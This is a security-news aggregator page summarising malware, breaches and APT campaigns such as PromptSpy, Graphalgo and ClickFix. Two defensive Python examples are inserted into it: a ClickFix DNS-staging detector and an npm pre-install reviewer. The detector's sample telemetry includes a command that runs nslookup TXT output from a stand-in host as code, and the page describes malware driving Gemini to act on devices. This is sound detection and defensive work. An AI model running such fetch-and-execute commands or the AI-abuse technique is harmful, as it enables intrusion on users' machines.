Daily Recap: Android malware such as PromptSpy uses Gemini at runtime to drive UI actions, deploy a VNC module, steal unlock credentials, and block uninstallation. Infostealers are becoming key initial-access vectors linked to Bitter APT, Volt Typhoon remains embedded in US utilities, and ransomware incidents hit Advantest and tribal services, highlighting ongoing risks to critical infrastructure and government services. #PromptSpy #VoltTyphoon
Tag: BLOCKCHAIN
Proofpoint identified a new malware-as-a-service (MaaS) called TrustConnect that masqueraded as a legitimate remote monitoring and management (RMM) tool, used an EV code signing certificate to sign branded installers, and provided a web-based C2/dashboard with automated payload generation and a $300/month subscription model. Proofpoint disrupted the TrustConnect infrastructure (C2 domain trustconnectsoftware[.]com…
Nearly 1 million user records were exposed in a breach at blockchain-powered lender Figure Technology Solutions after an employee fell victim to a social engineering attack. The ShinyHunters group claimed responsibility and published more than 2.4GB of stolen files, with Have I Been Pwned identifying roughly 967,000 affected Figure records, including…
Hackers stole personal and contact information from nearly 1 million accounts after breaching Figure Technology Solutions in a social engineering attack, with Have I Been Pwned reporting data from 967,200 accounts dating to January 2026. Extortion group ShinyHunters claimed responsibility and posted roughly 2.5GB of stolen loan applicant data, and the incident is linked to broader vishing campaigns targeting SSO providers and multiple high‑profile organizations. #Figure #ShinyHunters
Researchers at Kaspersky have analyzed Keenadu, an Android backdoor found preinstalled in device firmware or delivered via OTA updates and malicious apps, which gives operators full remote control and is primarily used for ad fraud. Kaspersky detected roughly 13,000 infections across countries including Russia, Japan, Germany, Brazil, and the Netherlands, and…
ReversingLabs uncovered a modular fake recruitment campaign named graphalgo that uses deceptive blockchain job tasks to distribute malicious npm and PyPI packages to JavaScript and Python developers. The operation, attributed to the North Korea-linked Lazarus Group, deploys fake companies like Veltrix Capital, staged interview repositories, and delayed malicious package updates that…
Figure confirmed a data breach after an employee fell for a social engineering attack that allowed hackers to steal a limited number of files. ShinyHunters claimed responsibility and released about 2.5GB of stolen data while Figure notifies affected individuals and offers free credit monitoring. #Figure #ShinyHunters…
Microsoft disclosed a new ClickFix variant that tricks users into running nslookup via the Windows Run dialog and cmd.exe to perform DNS-based staging and fetch a second-stage payload. The chain downloads a ZIP from azwsappdev[.]com that leads to a Python script, VBScript and ModeloRAT persistence, while related campaigns use CastleLoader, Lumma…
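The Run-dialog-to-nslookup chain above leaves a distinctive process tree (explorer.exe spawning a shell that spawns nslookup.exe). The following detection logic is an added example and is not code from Microsoft's report or from this page; it runs over constructed Sysmon-style process-creation records with hypothetical users and domains. That the staging uses TXT records and that the shell feeds nslookup's output back into a command are assumptions about common DNS-staging tradecraft, not details taken from the page.

```python
"""Detect ClickFix-style DNS staging via nslookup in process-creation telemetry.

Added example, not code from the Microsoft report or from this page. Fields
mirror Sysmon Event ID 1 / Windows 4688 records; all events below are
constructed, with hypothetical users and domains. That the staging uses TXT
records and that the shell consumes nslookup's output as commands are
assumptions about common DNS-staging tradecraft, not details taken from the page.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    user: str


# Constructed sample telemetry (hypothetical). PID 1 stands in for a parent
# that is outside the capture window.
EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe", "CORP\\alice"),
    # User pasted a command into Win+R: cmd spawned by explorer, nslookup by cmd,
    # and the for /f loop executes whatever the lookup returns.
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c "for /f %a in (\'nslookup -type=txt s1.example-stage.invalid\') do @%a"',
              "CORP\\alice"),
    ProcEvent(201, 200, r"C:\Windows\System32\nslookup.exe",
              "nslookup -type=txt s1.example-stage.invalid", "CORP\\alice"),
    # Benign: helpdesk resolving an internal host from an interactive console.
    ProcEvent(300, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe", "CORP\\helpdesk"),
    ProcEvent(301, 300, r"C:\Windows\System32\nslookup.exe",
              "nslookup dc01.corp.internal", "CORP\\helpdesk"),
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
USER_LAUNCHERS = {"explorer.exe"}           # Run dialog and Start menu launch through explorer
INTERNAL_SUFFIXES = (".corp.internal",)     # hypothetical allowlist of corporate zones
TXT_QUERY = re.compile(r"-(?:type|q|querytype)=txt\b", re.I)
OUTPUT_AS_COMMAND = re.compile(r"for\s+/f|\|\s*(?:powershell|pwsh|cmd)\b|\biex\b", re.I)


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def queried_name(cmdline: str):
    """Return the first non-option argument that looks like a DNS name."""
    for tok in cmdline.split()[1:]:
        if not tok.startswith("-") and "." in tok:
            return tok.strip("'\"").lower()
    return None


def find_nslookup_staging(events):
    """Return (pid, user, reasons) for nslookup executions that look like staging.

    A single weak signal (an external lookup) is ignored; two or more are
    reported, so routine external name resolution does not page anyone.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if _basename(ev.image) != "nslookup.exe":
            continue
        reasons = []
        parent = by_pid.get(ev.ppid)
        grand = by_pid.get(parent.ppid) if parent else None
        if parent and _basename(parent.image) in SHELLS \
                and grand and _basename(grand.image) in USER_LAUNCHERS:
            reasons.append("shell spawned by explorer.exe (Run dialog / user-typed command)")
        if TXT_QUERY.search(ev.cmdline):
            reasons.append("TXT record query, a common carrier for staged commands")
        if parent and OUTPUT_AS_COMMAND.search(parent.cmdline):
            reasons.append("parent shell feeds nslookup output back into a command")
        name = queried_name(ev.cmdline)
        if name and not name.endswith(INTERNAL_SUFFIXES):
            reasons.append(f"external name queried: {name}")
        if len(reasons) >= 2:
            findings.append((ev.pid, ev.user, reasons))
    return findings


if __name__ == "__main__":
    for pid, user, reasons in find_nslookup_staging(EVENTS):
        print(f"pid={pid} user={user}")
        for r in reasons:
            print(f"  - {r}")
```

On the constructed data only the pasted-in chain is reported (four signals); the helpdesk lookup produces none. In production the explorer.exe ancestry check is the strongest of the four, because administrators run nslookup from consoles and scripts, not from the Run dialog.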
The notorious North Korean Lazarus Group has launched “Graphalgo,” a sophisticated fake-recruiter campaign targeting Python and JavaScript developers in the cryptocurrency sector by luring them with lucrative job offers. The operation uses a modular, multi-stage infection chain that hides malicious payloads in open-source packages—most notably the npm package bigmathutils—and leverages public…
A new variation of a fake recruiter campaign attributed to North Korea’s Lazarus group targets JavaScript and Python developers with cryptocurrency-related coding tasks that trick applicants into running malicious repositories. Researchers uncovered 192 malicious npm and PyPI packages dubbed “Graphalgo” that deliver a modular RAT capable of MetaMask theft, token‑protected C2, remote command execution, and data exfiltration; impacted developers should rotate credentials and reinstall their OS. #Graphalgo #Lazarus
ReversingLabs uncovered a modular software‑supply‑chain campaign called graphalgo, attributed to North Korea’s Lazarus Group, that targets JavaScript and Python developers via fake recruiter job tasks and malicious packages on npm and PyPI. The operation uses fake company personas (e.g., Veltrix Capital), social outreach (LinkedIn, Facebook, Reddit), dependency-based infection (packages such as bigmathutils and graphnetworkx), and multistage downloaders that deploy a token‑protected RAT communicating with codepool[.]cloud. #LazarusGroup #graphalgo
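The graphalgo tradecraft described in the entries above (dependency-based infection and delayed malicious package updates) works because a cloned "interview task" repository is usually installed and run without inspection. The following pre-install review is an added example, not code from ReversingLabs or from this page. It checks the two things a delayed malicious update relies on: floating version ranges that silently pull a later release, and install-time scripts that run before any application code. The manifest and lockfile are constructed; bigmathutils is a package name the page mentions, while the version numbers, the "helperlib" package and the URLs are made up.

```python
"""Pre-install review of a cloned "take-home task" npm project.

Added example, not code from ReversingLabs or from this page. It checks the
two things a delayed malicious package update relies on: floating version
ranges that silently pull a later release, and install-time scripts that run
before any application code. The manifest and lockfile below are constructed;
"bigmathutils" is a package name the page mentions, the versions, the
"helperlib" package and the URLs are made up.
"""
import json
import re
from urllib.parse import urlparse

SAMPLE_PACKAGE_JSON = """{
  "name": "graph-task",
  "version": "1.0.0",
  "scripts": {
    "test": "node test.js",
    "postinstall": "node ./scripts/setup.js"
  },
  "dependencies": {
    "express": "4.18.2",
    "bigmathutils": "^1.2.0",
    "lodash": "latest"
  },
  "devDependencies": {
    "jest": "~29.7.0"
  }
}"""

# lockfileVersion 3 layout: one entry per installed path under "packages".
SAMPLE_PACKAGE_LOCK = """{
  "name": "graph-task",
  "lockfileVersion": 3,
  "packages": {
    "": { "dependencies": { "bigmathutils": "^1.2.0", "express": "4.18.2" } },
    "node_modules/express": {
      "version": "4.18.2",
      "resolved": "https://registry.npmjs.org/express/-/express-4.18.2.tgz"
    },
    "node_modules/bigmathutils": {
      "version": "1.2.3",
      "resolved": "https://registry.npmjs.org/bigmathutils/-/bigmathutils-1.2.3.tgz",
      "hasInstallScript": true
    },
    "node_modules/helperlib": {
      "version": "0.0.1",
      "resolved": "https://cdn.example-mirror.invalid/helperlib-0.0.1.tgz"
    }
  }
}"""

LIFECYCLE_SCRIPTS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.-]+)?$")
TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org"}   # assumption: only the public registry is allowed


def review_manifest(text: str):
    """Flag lifecycle scripts and non-exact dependency specifiers in package.json."""
    manifest = json.loads(text)
    findings = []
    for script in LIFECYCLE_SCRIPTS:
        if script in manifest.get("scripts", {}):
            findings.append(("lifecycle-script", script, manifest["scripts"][script]))
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for dep, spec in manifest.get(section, {}).items():
            if not EXACT_VERSION.match(spec):
                findings.append(("floating-version", dep, spec))
    return findings


def review_lockfile(text: str):
    """Flag transitive packages with install scripts or off-registry tarballs."""
    lock = json.loads(text)
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:            # "" is the root project itself
            continue
        name = path.rsplit("node_modules/", 1)[-1]
        if meta.get("hasInstallScript"):
            findings.append(("install-script", name, meta.get("version", "?")))
        host = urlparse(meta.get("resolved", "")).hostname or ""
        if host not in TRUSTED_REGISTRY_HOSTS:
            findings.append(("off-registry-source", name, meta.get("resolved", "")))
    return findings


if __name__ == "__main__":
    for kind, name, detail in review_manifest(SAMPLE_PACKAGE_JSON) + review_lockfile(SAMPLE_PACKAGE_LOCK):
        print(f"{kind:20} {name:15} {detail}")
```

Run this before `npm ci --ignore-scripts` in a throwaway VM, never on the workstation that holds wallet extensions and SSH keys. The lockfile check is only as good as the lockfile: a task repository shipped without one gets whatever version the registry serves at install time, which is exactly the delayed update the campaign relies on.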
Cybersecurity startup Outtake raised $40 million in a Series B led by ICONIQ to build a unified platform that preserves digital trust against surging AI-driven phishing and impersonation attacks. The platform uses agentic AI and OSINT scanning to detect references to critical assets across text, images, video, and audio while offering…
Daily Recap: exposed test credentials in a public S3 bucket let an attacker gain full administrative control of an AWS environment in eight minutes via Lambda code injection and privilege escalation, while Google Looker vulnerabilities enabled RCE and data exfiltration in both cloud instances and self-hosted deployments. The recap also covers the Harvard Alumni data breach tied to ShinyHunters, the Panera data exposure, the Incognito Market operator's 30-year sentence, rising ransomware activity from Qilin and CL0P, and notable nation-state and cyberespionage campaigns such as Lotus Blossom and Amaranth Dragon. #ShinyHunters #HarvardAlumni #PaneraBread #IncognitoMarket #Qilin #CL0P #LotusBlossom #AmaranthDragon #TRMLabs #AWS #Looker
Nullify raised $12.5 million in a seed round led by SYN Ventures, bringing total funding to $16.9 million to scale go-to-market, engineering and research teams, and expand internationally. Nullify’s AI-based autonomous workforce for vulnerability management integrates with codebases, cloud environments, ticketing systems and a long-term memory called Vault to detect, triage,…
Rui-Siang Lin, operating as "Pharaoh," ran Incognito Market into a darknet narcotics enterprise with more than $105 million in sales that facilitated hundreds of thousands of transactions and sold fentanyl-laced pills linked to at least one reported death. Lin was sentenced to 30 years in prison, signaling that industrial-scale dark web marketplaces and their operators…